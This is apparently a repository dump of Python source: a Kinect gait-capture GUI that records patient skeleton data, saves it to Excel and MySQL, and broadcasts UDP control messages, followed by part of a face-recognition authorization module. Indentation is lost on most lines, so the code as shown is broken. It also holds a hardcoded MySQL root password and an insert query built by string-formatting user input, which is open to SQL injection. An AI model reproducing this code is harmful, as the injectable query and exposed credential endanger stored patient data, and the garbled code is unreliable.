FeatureOutknee[row, i] = colmean[row][0]
plt.plot(TimeF[0, :], FeatureOutknee[:,0],'-r', TimeF[0, :], FeatureOutknee[:,1],'-g')
plt.xlabel('Time')
plt.ylabel('Tangent of the Angle')
plt.title("The curve of the tangent of an Right Side Angle over time")
plt.legend(["Hip-knee", "Knees-ankles"], loc='upper right')
picture_name = filename.split('.')[0] + ".png"
plt.savefig(picture_name)
np.savetxt(filename.split('.')[0] + "_processed.txt", FeatureOutknee ,fmt='%f',delimiter=' ')
plt.show()
return picture_name
def left_data_process(self):
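        # Same pipeline as right_data_process, but for the left hip-knee and
        # knee-ankle angles (joints 12, 13, 14).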
filename = self.input_file.value
print(filename)
data = np.loadtxt(filename)
roworg, colorg = data.shape
lastTF = 10
firstTF = 10
roworg = roworg - lastTF - firstTF
dataorg = np.zeros((roworg,colorg))
for i in range(roworg):
for j in range(colorg):
dataorg[i][j] = data[i+firstTF,j]
print('test')
for i in range(75):
colmean = self.meanfilter(dataorg[:, i], 2)
for row in range(roworg):
dataorg[row, i] = colmean[row][0]
        pointNumi = 13  # KneeLeft
        pointNumj = 12  # HipLeft
        pointNumk = 14  # AnkleLeft
        TimeF = np.zeros((1, roworg))
        FeatureOutknee = np.zeros((roworg, 2))
        for rownow in range(roworg):
            FeatureOutknee[rownow, 0] = (dataorg[rownow, 3*pointNumi] - dataorg[rownow, 3*pointNumj]) / (dataorg[rownow, 3*pointNumi + 1] - dataorg[rownow, 3*pointNumj + 1])  # knee-left / hip-left angle
            FeatureOutknee[rownow, 1] = (dataorg[rownow, 3*pointNumi] - dataorg[rownow, 3*pointNumk]) / (dataorg[rownow, 3*pointNumi + 1] - dataorg[rownow, 3*pointNumk + 1])  # knee-left / ankle-left angle
            TimeF[0, rownow] = rownow
for i in range(2):
colmean = self.meanfilter(FeatureOutknee[:, i], 2)
for row in range(roworg):
FeatureOutknee[row, i] = colmean[row][0]
plt.plot(TimeF[0, :], FeatureOutknee[:,0],'-r', TimeF[0, :], FeatureOutknee[:,1],'-g')
plt.xlabel('Time')
plt.ylabel('Tangent of the Angle')
plt.title("The curve of the tangent of an Left Side Angle over time")
plt.legend(["Hip-knee", "Knees-ankles"], loc='upper right')
picture_name = filename.split('.')[0] + ".png"
plt.savefig(picture_name)
np.savetxt(filename.split('.')[0] + "_processed.txt", FeatureOutknee ,fmt='%f',delimiter=' ')
plt.show()
return picture_name
class PersonalDataDialog(gui.Dialog):
def __init__(self,**params):
title = gui.Label("Commit personal data to database")
self.t= gui.Table(width=600, height=300)
td_style = {'padding_right': 10}
self.t.tr()
self.t.td( gui.Label('Original Data File Name:') , style=td_style)
self.original_input_file = gui.Input(size=40)
self.t.td( self.original_input_file, style=td_style, colspan=1, )
b = gui.Button("Browse...")
self.t.td( b, style=td_style, colspan=1 )
b.connect(gui.CLICK, self.open_original_file_browser, None)
self.t.tr()
self.t.td( gui.Label('Processed Data File Name:') , style=td_style)
self.processed_input_file = gui.Input(size=40)
self.t.td( self.processed_input_file, style=td_style, colspan=1, )
b = gui.Button("Browse...")
self.t.td( b, style=td_style, colspan=1 )
b.connect(gui.CLICK, self.open_processed_file_browser, None)
self.t.tr()
self.t.td( gui.Label('Person Name:') , style=td_style)
self.name = gui.TextArea('')
self.t.td(self.name)
self.t.tr()
b = gui.Button("Connect database")
self.t.td( b, style=td_style, colspan=2)
b.connect(gui.CLICK, self.connect_database)
b = gui.Button("Commit data")
self.t.td( b, style=td_style, colspan=2)
b.connect(gui.CLICK, self.commit_data)
self.db = None
gui.Dialog.__init__(self,title,self.t)
def open_original_file_browser(self, arg):
d = gui.FileDialog()
d.connect(gui.CHANGE, self.handle_original_file_browser_closed, d)
d.open()
def handle_original_file_browser_closed(self, dlg):
if dlg.value:
self.original_input_file.value = dlg.value.split('\\')[-1]
def open_processed_file_browser(self, arg):
d = gui.FileDialog()
d.connect(gui.CHANGE, self.handle_processed_file_browser_closed, d)
d.open()
def handle_processed_file_browser_closed(self, dlg):
if dlg.value:
self.processed_input_file.value = dlg.value.split('\\')[-1]
    def connect_database(self):
        try:
            # PyMySQL >= 1.0 requires keyword arguments for connect()
            self.db = pymysql.connect(host="localhost", user="root", password="hh19950208", database="gait")
            MassageBox.msg = "Database connection successful"
            MassageBox().open()
        except Exception:
            MassageBox.msg = "Database connection failed"
            MassageBox().open()
    def commit_data(self):
        try:
            cursor = self.db.cursor()
            with open(self.original_input_file.value, 'r', encoding='utf-8') as f:
                gait_original_data = f.read()
            with open(self.processed_input_file.value, 'r', encoding='utf-8') as f:
                processed_data = f.read()
            name = self.name.value
            # parameterized query: PyMySQL escapes each value, so quotes in the data cannot break the SQL
            sql = "insert into personaldata (name, original_data, processed_data) values (%s, %s, %s)"
            try:
                cursor.execute(sql, (name, gait_original_data, processed_data))
                self.db.commit()
                MassageBox.msg = "commit personal data successfully"
                MassageBox().open()
            except Exception:
                self.db.rollback()
                MassageBox.msg = "commit personal data unsuccessfully"
                MassageBox().open()
        except Exception:
            MassageBox.msg = "please connect to the database or select file first"
            MassageBox().open()
class SkeletonControl(gui.Table):
run_capture = False
mydatetime = "0-0-0-0-0-0-0"
status = "When there is a skeleton picture, click 'start' to record"
textarea = gui.TextArea(value=status, width=500, height=20)
name = gui.Input(value='',size=16)
kl_result = gui.Select(value='0')
save_pic = False
sex = gui.Select(value='Male')
age = gui.Input(value='',size=16)
height = gui.Input(value='',size=16)
weight = gui.Input(value='',size=16)
db = None
def __init__(self,**params):
gui.Table.__init__(self,**params)
fg = (0,0,0)
# self.timesup_dialog = TimesUpDialog()
self.draw_graph_dialog = DrawGraphDialog()
self.personal_data_dialog = PersonalDataDialog()
self.tr()
self.td(gui.Label("Skeleton GUI",color=fg),colspan=2)
self.tr()
self.td(gui.Label("Name: ",color=fg),align=1)
self.td(self.name,colspan=1)
self.tr()
self.td(gui.Label("KL_Result: ",color=fg),align=1)
self.td(self.kl_result)
self.kl_result.add("0",'0')
self.kl_result.add("1",'1')
self.kl_result.add("2",'2')
self.kl_result.add("3",'3')
self.kl_result.add("4",'4')
self.tr()
self.td(gui.Label("Sex: ",color=fg),align=1)
self.td(self.sex)
self.sex.add("Male",'Male')
self.sex.add("Female",'Female')
self.tr()
self.td(gui.Label("Age: ",color=fg),align=1)
self.td(self.age,colspan=1)
self.tr()
self.td(gui.Label("Height(m): ",color=fg),align=1)
self.td(self.height,colspan=1)
self.tr()
self.td(gui.Label("Weight(kg): ",color=fg),align=1)
self.td(self.weight,colspan=1)
save_info_btn = gui.Button("Save Info")
save_info_btn.connect(gui.CLICK, self.click_save_info_btn)
self.tr()
self.td(save_info_btn, colspan=1)
start_btn = gui.Button("Start")
start_btn.connect(gui.CLICK, self.click_start_btn)
self.td(start_btn,colspan=1)
stop_btn = gui.Button("Stop")
stop_btn.connect(gui.CLICK, self.click_stop_btn)
self.td(stop_btn,colspan=1)
save_pic_btn = gui.Button("Save Pic")
save_pic_btn.connect(gui.CLICK, self.click_save_pic_btn)
self.tr()
self.td(save_pic_btn,colspan=1)
draw_graph_btn = gui.Button("Draw Graph")
draw_graph_btn.connect(gui.CLICK, self.draw_graph_dialog.open)
self.td(draw_graph_btn, colspan=1)
self.tr()
connect_db_btn = gui.Button('Connect database')
connect_db_btn.connect(gui.CLICK, self.click_connect_db_btn)
self.td(connect_db_btn, colspan=1)
commit_info_btn = gui.Button('commit info')
commit_info_btn.connect(gui.CLICK, self.click_commit_info_btn)
self.td(commit_info_btn, colspan=1)
commit_data_btn = gui.Button('commit data')
commit_data_btn.connect(gui.CLICK, self.click_commit_data_btn)
self.td(commit_data_btn, colspan=1)
self.tr()
self.td(gui.Label("MassageBox: ",color=fg),align=1)
self.td(SkeletonControl.textarea, colspan=4)
def lan_broadcast_msg(self, msg):
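        # Broadcast a control message to every listening SocketReceiver on the LAN
        # (UDP port 6666); messages are '-'-separated fields, e.g.
        # "startrecording-<name>-<kl>-<sex>-<age>-<height>-<weight>" or "timesup".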
msg = msg.encode()
host = "<broadcast>" # broadcast
port = 6666
addr = (host, port)
UDPSock = socket(AF_INET, SOCK_DGRAM)
UDPSock.bind(("", 0))
UDPSock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
UDPSock.sendto(msg, addr)
UDPSock.close()
def click_save_info_btn(self):
try:
wb = load_workbook("patients_info.xlsx")
sheet = wb.active
nrows = sheet.max_row
if self.name.value == sheet.cell(nrows, 1).value and self.kl_result.value == sheet.cell(nrows, 2).value and self.sex.value == sheet.cell(nrows, 3).value \
and self.age.value == sheet.cell(nrows, 4).value and self.height.value == sheet.cell(nrows, 5).value and self.weight.value == sheet.cell(nrows, 6).value:
MassageBox.msg = '"' + self.name.value + '"' + " infomation already saved"
MassageBox().open()
elif self.name.value == "" and self.kl_result.value == "" and self.sex.value == "" \
and self.age.value == "" and self.height.value == "" and self.weight.value == "":
MassageBox.msg = "please enter infomation first"
MassageBox().open()
else:
sheet.cell(nrows+1, 1).value = self.name.value
sheet.cell(nrows+1, 2).value = self.kl_result.value
sheet.cell(nrows+1, 3).value = self.sex.value
sheet.cell(nrows+1, 4).value = self.age.value
sheet.cell(nrows+1, 5).value = self.height.value
sheet.cell(nrows+1, 6).value = self.weight.value
try:
wb.save(filename="patients_info.xlsx")
MassageBox.msg = '"' + self.name.value + '"' + " infomation saved"
MassageBox().open()
except:
MassageBox.msg = 'please close "patients_info.xlsx" first'
MassageBox().open()
        except Exception:
            # first run: the workbook does not exist yet, so create it with headers
            wb = Workbook()
            sheet = wb.active
            sheet['A1'] = "Name"
            sheet['B1'] = "Knee osteoarthritis KL grade"
            sheet['C1'] = "Sex"
            sheet['D1'] = "Age"
            sheet['E1'] = "Height"
            sheet['F1'] = "Weight"
nrows = sheet.max_row
if self.name.value == "" and self.kl_result.value == "" and self.sex.value == "" \
and self.age.value == "" and self.height.value == "" and self.weight.value == "":
MassageBox.msg = "please enter infomation first"
MassageBox().open()
else:
sheet.cell(nrows+1, 1).value = self.name.value
sheet.cell(nrows+1, 2).value = self.kl_result.value
sheet.cell(nrows+1, 3).value = self.sex.value
sheet.cell(nrows+1, 4).value = self.age.value
sheet.cell(nrows+1, 5).value = self.height.value
sheet.cell(nrows+1, 6).value = self.weight.value
try:
wb.save(filename="patients_info.xlsx")
MassageBox.msg = '"' + self.name.value + '"' + " infomation saved"
MassageBox().open()
except:
MassageBox.msg = 'please close "patients_info.xlsx" first'
MassageBox().open()
def click_start_btn(self):
if SkeletonControl.run_capture:
self.textarea.value = "Recording Already Running"
MassageBox.msg = "Recording Already Running"
MassageBox().open()
return
else:
msg = "startrecording" + "-" + self.name.value + '-' + self.kl_result.value + '-' + self.sex.value + "-" + \
self.age.value + "-" + self.height.value + "-" + self.weight.value
for i in range(10):
self.lan_broadcast_msg(msg)
self.s = Myscheduler(time.time, time.sleep)
self.s.enter(10,1,self.times_up, ())
t=threading.Thread(target=self.s.run)
t.start()
def click_stop_btn(self):
if SkeletonControl.run_capture:
SkeletonControl.run_capture = False
self.s.stop()
self.textarea.value = "recording stopped"
MassageBox.msg = "recording stopped"
MassageBox().open()
else:
self.textarea.value = "start recording first"
MassageBox.msg = "start recording first"
MassageBox().open()
# self.timesup_dialog.open()
def click_save_pic_btn(self):
SkeletonControl.save_pic = True
def click_connect_db_btn(self):
        try:
            self.db = pymysql.connect(host="localhost", user="root", password="hh19950208", database="gait")
            MassageBox.msg = "Database connection successful"
            MassageBox().open()
        except Exception:
            MassageBox.msg = "Database connection failed"
            MassageBox().open()
def click_commit_info_btn(self):
try:
cursor = self.db.cursor()
name = self.name.value
kl_result = self.kl_result.value
sex = self.sex.value
age = self.age.value
height = self.height.value
weight = self.weight.value
if kl_result == "":
kl_result = -1
kl_result = int(kl_result)
if age == '':
age = -1
age = int(age)
if height == "":
height = -1
height = float(height)
if weight == '':
weight = -1
weight = float(weight)
sql = "insert into personalinfo (name, kl_result, sex, age, height, weight) values ('%s', '%d','%s', '%d', '%f', '%f')" % \
(name, kl_result, sex, age, height, weight)
try:
cursor.execute(sql)
self.db.commit()
MassageBox.msg = "commit personal infomation successfully"
MassageBox().open()
except Exception as err:
# print(err)
# self.db.rollback()
MassageBox.msg = "commit personal infomation unsuccessfully"
MassageBox().open()
cursor.close()
except Exception as err:
# print(err)
MassageBox.msg = "please connect to the database first"
MassageBox().open()
def click_commit_data_btn(self):
self.personal_data_dialog.open()
def get_datetime_string(self):
string = str(datetime.now())
mydate, mytime = string.split(" ")
hour, minute, second = mytime.split(":")
second = float(second)
millisecond = str(int((second - int(second)) * 1000))
second = str(int(second))
return mydate + "-" + hour + '-' + minute + '-' + second + '-' + millisecond
def times_up(self):
# self.run_capture = False
msg = 'timesup'
for i in range(10):
self.lan_broadcast_msg(msg)
self.textarea.value = "times up, recording stopped"
MassageBox.msg = 'TimeIsUp_RecordingFinished'
timesup_dialog = MassageBox()
timesup_dialog.open()
class Myscheduler(sched.scheduler):
    def __init__(self, timefunc=time.time, delayfunc=time.sleep):
        # pass the caller's functions through instead of hard-coded defaults
        sched.scheduler.__init__(self, timefunc, delayfunc)
        self._running = True
def stop(self):
self._running = False
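        # Clearing the flag does not interrupt a sleep already in progress: run()
        # re-checks _running on its next pass, and a pending event that was left in
        # the queue during its delay is then skipped rather than executed.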
def run(self, blocking=True):
"""Execute events until the queue is empty.
If blocking is False executes the scheduled events due to
expire soonest (if any) and then return the deadline of the
next scheduled call in the scheduler.
When there is a positive delay until the first event, the
delay function is called and the event is left in the queue;
otherwise, the event is removed from the queue and executed
(its action function is called, passing it the argument). If
the delay function returns prematurely, it is simply
restarted.
It is legal for both the delay function and the action
function to modify the queue or to raise an exception;
exceptions are not caught but the scheduler's state remains
well-defined so run() may be called again.
A questionable hack is added to allow other threads to run:
just after an event is executed, a delay of 0 is executed, to
avoid monopolizing the CPU when other threads are also
runnable.
"""
# localize variable access to minimize overhead
# and to improve thread safety
lock = self._lock
q = self._queue
delayfunc = self.delayfunc
timefunc = self.timefunc
pop = heapq.heappop
while self._running:
with lock:
if not q:
break
time, priority, action, argument, kwargs = q[0]
now = timefunc()
if time > now:
delay = True
else:
delay = False
pop(q)
if delay:
if not blocking:
return time - now
delayfunc(time - now)
else:
action(*argument, **kwargs)
delayfunc(0) # Let other threads run
class SocketReceiver:
def get_socket_data(self):
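        # Listen for the '-'-separated control broadcasts on UDP port 6666 and
        # mirror the sender's form fields into the SkeletonControl class attributes.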
host = ""
port = 6666
buf = 1024
addr = (host, port)
UDPSock = socket(AF_INET, SOCK_DGRAM)
UDPSock.bind(addr)
while True:
(data, addr) = UDPSock.recvfrom(buf)
data = data.decode()
data = data.split('-')
print(data)
if data[0] == "startrecording":
SkeletonControl.run_capture = True
SkeletonControl.mydatetime = self.get_datetime_string()
SkeletonControl.name.value = data[1]
SkeletonControl.kl_result.value = data[2]
SkeletonControl.sex.value = data[3]
SkeletonControl.age.value = data[4]
SkeletonControl.height.value = data[5]
SkeletonControl.weight.value = data[6]
if data[0] == "timesup":
SkeletonControl.run_capture = False
SkeletonControl.textarea.value = "times up, recording stopped"
def get_datetime_string(self):
string = str(datetime.now())
mydate, mytime = string.split(" ")
hour, minute, second = mytime.split(":")
second = float(second)
millisecond = str(int((second - int(second)) * 1000))
second = str(int(second))
return mydate + "-" + hour + '-' + minute + '-' + second + '-' + millisecond
def run(self):
self.get_socket_data()
class BodyGameRuntime(object):
def __init__(self):
pygame.init()
# Used to manage how fast the screen updates
self._clock = pygame.time.Clock()
# Set the width and height of the screen [width, height]
self._infoObject = pygame.display.Info()
self._screen = pygame.display.set_mode(((self._infoObject.current_w >> 1) + 300, (self._infoObject.current_h >> 1) + 300),
pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)
# pygame.display.set_caption("Kinect-based Gait Data Acquisition Software")
pygame.display.set_caption("基于Kinect的步态数据采集系统v1.0")
# Loop until the user clicks the close button.
self._done = False
# Kinect runtime object, we want only color and body frames
self._kinect = PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color | PyKinectV2.FrameSourceTypes_Body)
# back buffer surface for getting Kinect color frames, 32bit color, width and height equal to the Kinect color frame size
self._frame_surface = pygame.Surface((self._kinect.color_frame_desc.Width, self._kinect.color_frame_desc.Height), 0, 32)
# surface to draw skeleton
self._skeleton_surface = pygame.Surface((self._kinect.color_frame_desc.Width, self._kinect.color_frame_desc.Height), 0, 32)
self._gui_surface = pygame.Surface((self._screen.get_width(), self._screen.get_height() // 2), 0, 32)
# here we will store skeleton data
self._bodies = None
# self.app = gui.App()
self.app = gui.Desktop()
# self.app.screen = self._gui_surface
self.skeletonCtrl =SkeletonControl()
# self.c = gui.Container(align=-1,valign=-1, x=self._screen.get_width() // 2, y=self._frame_surface.get_height() // 2)
self.c = gui.Container(align=-1,valign=-1, x=0, y=0)
# self.c.add(self.skeletonCtrl,0, 0)
self.c.add(self.skeletonCtrl,300, 0)
# self.app.init(widget=self.c)#, screen=self._gui_surface) # area=(0, self._screen.get_height() // 2, self._screen.get_width(), self._screen.get_height() // 2))
# self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self._screen.get_height() // 2, self._screen.get_width(), self._screen.get_height() // 2))
self.h_to_w = float(self._frame_surface.get_height()) / self._frame_surface.get_width()
# print self._frame_surface.get_height(), self._frame_surface.get_width()
self.target_height = int(self.h_to_w * self._screen.get_width() // 2)
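        # Layout: the color view and the skeleton view each take half the window
        # width; target_height keeps the Kinect frame's aspect ratio, and the PGU
        # desktop is given the remaining strip below the video.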
self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self.target_height, self._screen.get_width(), self._screen.get_height() - self.target_height))
# self.warning_dialog = WarningdDialog()
def draw_body_bone(self, joints, jointPoints, color, joint0, joint1):
joint0State = joints[joint0].TrackingState
joint1State = joints[joint1].TrackingState
# both joints are not tracked
if (joint0State == PyKinectV2.TrackingState_NotTracked) or (joint1State == PyKinectV2.TrackingState_NotTracked):
return
# both joints are not *really* tracked
if (joint0State == PyKinectV2.TrackingState_Inferred) and (joint1State == PyKinectV2.TrackingState_Inferred):
return
# ok, at least one is good
start = (jointPoints[joint0].x, jointPoints[joint0].y)
end = (jointPoints[joint1].x, jointPoints[joint1].y)
try:
pygame.draw.line(self._skeleton_surface, color, start, end, 8)
except: # need to catch it due to possible invalid positions (with inf)
pass
def draw_body(self, joints, jointPoints, color):
# Torso
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_Head, PyKinectV2.JointType_Neck)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_Neck, PyKinectV2.JointType_SpineShoulder)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_SpineMid)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineMid, PyKinectV2.JointType_SpineBase)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_ShoulderRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_ShoulderLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineBase, PyKinectV2.JointType_HipRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineBase, PyKinectV2.JointType_HipLeft)
# Right Arm
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_ShoulderRight, PyKinectV2.JointType_ElbowRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_ElbowRight, PyKinectV2.JointType_WristRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_HandRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_HandRight, PyKinectV2.JointType_HandTipRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_ThumbRight)
# Left Arm
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_ShoulderLeft, PyKinectV2.JointType_ElbowLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_ElbowLeft, PyKinectV2.JointType_WristLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_HandLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_HandLeft, PyKinectV2.JointType_HandTipLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_ThumbLeft)
# Right Leg
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_HipRight, PyKinectV2.JointType_KneeRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_KneeRight, PyKinectV2.JointType_AnkleRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_AnkleRight, PyKinectV2.JointType_FootRight)
# Left Leg
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_HipLeft, PyKinectV2.JointType_KneeLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_KneeLeft, PyKinectV2.JointType_AnkleLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_AnkleLeft, PyKinectV2.JointType_FootLeft)
def draw_color_frame(self, frame, target_surface):
target_surface.lock()
address = self._kinect.surface_as_array(target_surface.get_buffer())
ctypes.memmove(address, frame.ctypes.data, frame.size)
del address
target_surface.unlock()
def run(self):
# run a new thread to receive socket data
socket_receiver = SocketReceiver()
receiver = threading.Thread(target=socket_receiver.run)
receiver.start()
# -------- Main Program Loop -----------
while not self._done:
# self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self._screen.get_height() // 2, self._screen.get_width(), self._screen.get_height() // 2))
# --- Main event loop
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
self._done = True # Flag that we are done so we exit this loop
elif event.type == pygame.VIDEORESIZE: # window resized
self._screen = pygame.display.set_mode(event.dict['size'],
pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)
self.target_height = int(self.h_to_w * self._screen.get_width() // 2)
# self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self._screen.get_height() // 2 + 50, self._screen.get_width(), self._screen.get_height() // 2 - 50))
self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self.target_height, self._screen.get_width(), self._screen.get_height() - self.target_height))
else:
self.app.event(event)
# print self._frame_surface.get_rect()
# print self._skeleton_surface.get_rect()
# --- Game logic should go here
# --- Getting frames and drawing
# --- Woohoo! We've got a color frame! Let's fill out back buffer surface with frame's data
if self._kinect.has_new_color_frame():
frame = self._kinect.get_last_color_frame()
self.draw_color_frame(frame, self._frame_surface)
frame = None
# --- Cool! We have a body frame, so can get skeletons
if self._kinect.has_new_body_frame():
self._bodies = self._kinect.get_last_body_frame()
# else:
# self._bodies = None
# --- draw skeletons to _frame_surface and write skeleton data to txt
if self._bodies is not None:
counter = 0
for i in range(0, self._kinect.max_body_count):
body = self._bodies.bodies[i]
if not body.is_tracked:
counter += 1
if counter == self._kinect.max_body_count:
SkeletonControl.textarea.value = "no skeleton data to record"
continue
if SkeletonControl.textarea.value == "no skeleton data to record":
SkeletonControl.textarea.value = "click 'start' to record"
joints = body.joints
# convert joint coordinates to color space
joint_points = self._kinect.body_joints_to_color_space(joints)
self.draw_body(joints, joint_points, SKELETON_COLORS[i])
# save skeleton data to .txt file
                    if SkeletonControl.run_capture:
                        SkeletonControl.textarea.value = "recording......"
                        with open(SkeletonControl.mydatetime + "-" + SkeletonControl.name.value + "-" + SkeletonControl.kl_result.value + ".txt", 'a') as f:
                            # use a separate index so the outer body-loop variable `i` is not shadowed
                            for j in range(PyKinectV2.JointType_Count):
                                f.write('{:.7f}'.format(joints[j].Position.x) + ' ' + '{:.7f}'.format(joints[j].Position.y) + ' ' + '{:.7f}'.format(joints[j].Position.z) + ' ')
                            f.write("\n")
# --- copy back buffer surface pixels to the screen, resize it if needed and keep aspect ratio
# --- (screen size may be different from Kinect's color frame size)
# h_to_w = float(self._frame_surface.get_height()) / self._frame_surface.get_width()
# print self._frame_surface.get_height(), self._frame_surface.get_width()
# target_height = int(self.h_to_w * self._screen.get_width() // 2)
surface_to_draw = pygame.transform.scale(self._frame_surface, (self._screen.get_width() // 2, self.target_height))
            if SkeletonControl.save_pic:
pygame.image.save(self._frame_surface, self.skeletonCtrl.get_datetime_string() + "-" + SkeletonControl.name.value + '-' + SkeletonControl.kl_result.value + '.png')
MassageBox.msg ='picture saved'
picture_saved_dialog = MassageBox()
picture_saved_dialog.open()
SkeletonControl.save_pic = False
skeleton_surface_to_draw = pygame.transform.scale(self._skeleton_surface, (self._screen.get_width() // 2, self.target_height))
# gui_surface_to_draw = pygame.transform.scale(self._gui_surface, (self._screen.get_width(), self._screen.get_height() // 2))
self._screen.blit(surface_to_draw, (0,0))
self._screen.blit(skeleton_surface_to_draw, (self._screen.get_width() // 2, 0))
# self._screen.blit(gui_surface_to_draw, (0, self._screen.get_height() // 2))
surface_to_draw = None
skeleton_surface_to_draw = None
# gui_surface_to_draw = None
self._skeleton_surface.fill((0, 0, 0))
pygame.display.update()
self.app.paint()
# --- Go ahead and update the screen with what we've drawn.
pygame.display.flip()
# --- Limit to 30 frames per second
self._clock.tick(30)
# Close our Kinect sensor, close the window and quit.
self._kinect.close()
pygame.quit()
__main__ = "Kinect v2 Body Game"
game = BodyGameRuntime()
game.run()
|
authorization.py
|
import cv2
import os
import sys
import pickle
import face_recognition
from threading import Thread
from smartmirror.Logger import Logger
PATH = os.path.dirname(os.path.realpath(__file__))
if sys.platform != 'linux':
PATH = PATH.replace("\\", '/')
"""
Authorization Class
- authorization is based on face recognition method
- two options available :
1. opencv face lib
2. face_recognition (dlib)
- name_id is collected by a folder name where person images are located
"""
class Authorization:
def __init__(self, camera, callback):
self.camera = camera
self.callback_authorized_user = callback
self.thread_running = False
self.authorization_process_running = False
self.debug = False
self.font = cv2.FONT_HERSHEY_SIMPLEX
self.detected = {}
self.samples_confidence = 20
self.min_width = 0.1 * self.camera.get(3)
self.min_height = 0.1 * self.camera.get(4)
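        # ignore detections smaller than 10% of the camera frame in either dimension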
try:
            # the standard OpenCV cascade file is named "haarcascade_frontalface_default.xml"
            self.face_cascade = cv2.CascadeClassifier(PATH + '/../cascades/haarcascade_frontalface_default.xml')
except Exception as exception:
print("Face Cascade Classifier reading file problem: {0}".format(exception))
return
def run_opencv_face_recognition(self):
folders_name = [f for f in os.listdir(PATH + '/../dataset')]
tmp = 0
faces_dic = {}
for name_id in folders_name:
if name_id not in faces_dic.values():
faces_dic[tmp] = name_id
tmp += 1
recognizer = cv2.face.LBPHFaceRecognizer_create() # https://docs.opencv.org/3.4/d4/d48/namespacecv_1_1face.html
recognizer.read(PATH + '/../trained_data/trainer.yml')
while self.thread_running and self.authorization_process_running:
response, image = self.camera.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
detected_face_square = self.face_cascade.detectMultiScale(gray, scaleFactor=1.2, minNeighbors=5,
minSize=(int(self.min_width), int(self.min_height)))
for (x, y, width, height) in detected_face_square:
cv2.rectangle(image, (x, y), (x + width, y + height), (0, 255, 0), 2)
                name_id, confidence = recognizer.predict(gray[y:y + height, x:x + width])
                recognition_name = "unknown"
                # LBPH "confidence" is a distance: lower values mean a closer match
                if confidence < 100:
                    recognition_name = faces_dic[name_id]
                    self.add_detected_face(str(recognition_name))
                confidence = " {0}%".format(round(100 - confidence))
cv2.putText(image, str(recognition_name), (x + 5, y - 5), self.font, 1, (255, 255, 255), 1)
cv2.putText(image, str(confidence), (x + 5, y + height - 5), self.font, 1, (255, 255, 255), 1)
if self.debug:
cv2.imshow('Authorization detected', image)
cv2.waitKey(10)
def run_dlib_face_recognition(self):
data = pickle.loads(open(PATH + "/../trained_data/encodings.pickle", "rb").read())
while self.thread_running and self.authorization_process_running:
response, image = self.camera.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
detected_face_square = self.face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5,
minSize=(int(self.min_width), int(self.min_height)))
boxes = [(y, x + width, y + height, x) for (x, y, width, height) in detected_face_square]
encodings = face_recognition.face_encodings(rgb, boxes)
names = []
recognition_name = "Unknown"
for encoding in encodings:
matches = face_recognition.compare_faces(data["encodings"], encoding)
if True in matches:
matched_index = [i for (i, b) in enumerate(matches) if b]
counts = {}
for i in matched_index:
recognition_name = data["names"][i]
counts[recognition_name] = counts.get(recognition_name, 0) + 1
recognition_name = max(counts, key=counts.get)
names.append(recognition_name)
for ((top, right, bottom, left), name) in zip(boxes, names):
cv2.rectangle(image, (left, top), (right, bottom), (0, 255, 0), 2)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(image, name, (left, y), self.font, 1, (255, 255, 255), 1)
if recognition_name != "Unknown":
self.add_detected_face(recognition_name)
if self.debug:
cv2.imshow('Authorization detected', image)
cv2.waitKey(10)
def add_detected_face(self, name):
Logger.debug("Detected {0}".format(name))
if name in self.detected:
self.detected[name] += 1
else:
self.detected[name] = 1
self.recognition_confidence()
def recognition_confidence(self):
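        # Once any single name has been seen `samples_confidence` times, stop the
        # recognition loop and hand that name to the authorized-user callback.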
Logger.debug("Authorization confidence {0}".format(self.detected))
if self.samples_confidence in self.detected.values():
Logger.debug("Authorization confidence {0}".format(self.samples_confidence))
self.authorization_process_running = False
for name, confidence in self.detected.items():
if self.samples_confidence == confidence:
self.callback_authorized_user(name)
def run(self, method='opencv_face_recognition', debug=False):
Logger.debug("Start authorization thread: {0}".format(method))
self.thread_running = True
self.authorization_process_running = True
self.debug = debug
        if method == 'opencv_face_recognition':
